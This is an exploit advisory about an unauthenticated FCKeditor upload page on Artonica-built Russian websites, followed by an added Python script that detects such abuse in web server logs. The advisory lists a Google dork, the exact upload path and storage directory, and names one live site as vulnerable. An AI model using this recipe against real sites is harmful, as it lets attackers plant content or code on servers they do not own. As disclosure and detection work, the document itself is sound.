Website Development (Разработка сайта) Artonica Russia Unauthorized File Insertion

2019.05.23
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

####################################################################
# Exploit Title : Website Development (Разработка сайта) Artonica Russia Unauthorized File Insertion
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21/05/2019
# Vendor Homepage : artonica.ru
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:Разработка сайта: Artonica site:ru
# Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] (the specific weakness is CWE-434, Unrestricted Upload of File with Dangerous Type)
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description About Software :
*****************************
Artonica is a web design and development company in Russia. The issue below affects websites built by Artonica (identifiable by the "Разработка сайта: Artonica" footer text), not the artonica.ru site itself.
####################################################################
# Impact :
***********
Websites built by Artonica ship the FCKeditor file manager, including its developer test page uploadtest.html, under /common/admin/ without any authentication, and the upload connector does not adequately validate user-supplied files. An unauthenticated remote attacker can therefore upload arbitrary files into a web-reachable directory (/common/upload/). Where the connector accepts a server-side script extension, or the upload directory is configured to execute scripts, this yields arbitrary code execution in the context of the web server process; with only the extensions observed below (.txt, .jpg, .gif, .png) it still allows planting attacker-controlled content on the site (defacement, phishing pages, malware hosting). This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert Exploit :
**************************************************
Open the exposed FCKeditor upload test page:

/common/admin/vendor/fckeditor/editor/filemanager/connectors/uploadtest.html

Select the "File Uploader" to use: PHP
Resource Type : (as offered by the page)

Choose a local file and submit the form. The connector stores it under the site's upload directory, and the uploaded file is then reachable at:

Directory File Path :
******************
/common/upload/[YOURFILENAME].txt .jpg .gif .png

(.txt, .jpg, .gif and .png are the extensions observed to be accepted.) To confirm the issue without causing damage, upload a harmless .txt file with a unique marker string, then request it at the path above and check that the marker comes back.
####################################################################
# Example Vulnerable Sites :
************************
[+] afrocom.ru/common/admin/vendor/fckeditor/editor/filemanager/connectors/uploadtest.html
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
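For defenders triaging a site built on this stack, the useful check is whether the connector paths named above are being hit and whether the same client then fetches something from /common/upload/. The following is an added example (not part of the original advisory and not code from the advisory's author) that runs that detection over combined-format access log lines. The connector directory and upload directory are taken from the advisory; the connector file names php/upload.php and php/connector.php are the standard FCKeditor 2.x layout and are an assumption here; the log lines are constructed for the example.

```python
"""Detect FCKeditor connector abuse of the kind described in the advisory
in Apache/nginx combined-format access logs.  Added example; log lines are
constructed, not taken from any real site."""
import os
import re
from dataclasses import dataclass

# Paths from the advisory.  The connector file names under CONNECTOR_DIR
# (uploadtest.html, php/upload.php, php/connector.php) follow the standard
# FCKeditor 2.x layout; that layout is assumed, not taken from the advisory.
CONNECTOR_DIR = "/common/admin/vendor/fckeditor/editor/filemanager/connectors/"
UPLOAD_DIR = "/common/upload/"
SCRIPT_EXTS = {".php", ".php3", ".php5", ".phtml", ".phar"}

# Combined log format up to the status and size fields; referer and UA are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

CONNECTOR_KINDS = {"connector_test_page", "connector_upload", "connector_access"}
UPLOAD_KINDS = {"upload_dir_fetch", "uploaded_script_request"}


@dataclass
class Finding:
    ip: str
    ts: str
    kind: str
    target: str
    status: int


def parse_line(line):
    """Return the parsed fields of one combined-format log line, or None."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """Map one parsed request to a finding kind, or None if it is unremarkable."""
    path, _, query = entry["target"].partition("?")
    if path.startswith(CONNECTOR_DIR):
        if path.endswith("uploadtest.html"):
            return "connector_test_page"       # developer test page reachable at all
        if entry["method"] == "POST" or "Command=FileUpload" in query:
            return "connector_upload"          # an actual upload attempt
        return "connector_access"              # folder listing / browsing via the connector
    if path.startswith(UPLOAD_DIR):
        if os.path.splitext(path)[1].lower() in SCRIPT_EXTS:
            return "uploaded_script_request"   # someone asking the server to run a script here
        return "upload_dir_fetch"              # harmless alone; suspicious right after connector use
    return None


def scan(lines):
    """Parse and classify every line; returns findings in log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        kind = classify(entry)
        if kind:
            findings.append(Finding(entry["ip"], entry["ts"], kind,
                                    entry["target"], int(entry["status"])))
    return findings


def suspicious_ips(findings):
    """IPs that touched the connector and afterwards fetched from the upload directory."""
    touched, flagged = set(), set()
    for f in findings:                         # findings are in log order
        if f.kind in CONNECTOR_KINDS:
            touched.add(f.ip)
        elif f.kind in UPLOAD_KINDS and f.ip in touched:
            flagged.add(f.ip)
    return flagged


# Constructed sample: one client walks the chain from the advisory, another just
# browses the site and loads an image that legitimately lives in /common/upload/.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/May/2019:10:14:02 +0300] "GET /common/admin/vendor/fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1" 200 4123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/May/2019:10:14:31 +0300] "POST /common/admin/vendor/fckeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/May/2019:10:14:40 +0300] "GET /common/upload/test.txt HTTP/1.1" 200 58 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [21/May/2019:10:14:45 +0300] "GET /common/upload/test.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [21/May/2019:10:15:00 +0300] "GET /index.php HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '198.51.100.2 - - [21/May/2019:10:15:05 +0300] "GET /common/upload/logo.png HTTP/1.1" 200 1200 "http://example.ru/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    results = scan(SAMPLE_LOG)
    for f in results:
        print(f"{f.ts}  {f.ip:<14} {f.kind:<24} {f.status}  {f.target}")
    print("suspicious:", sorted(suspicious_ips(results)))
```

Any hit on uploadtest.html is worth an alert on its own, since that page has no business being reachable on a production site; the correlation in suspicious_ips is there to separate a client that uploaded and then came back for the file from ordinary visitors loading images out of /common/upload/.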


Copyright 2019, cxsecurity.com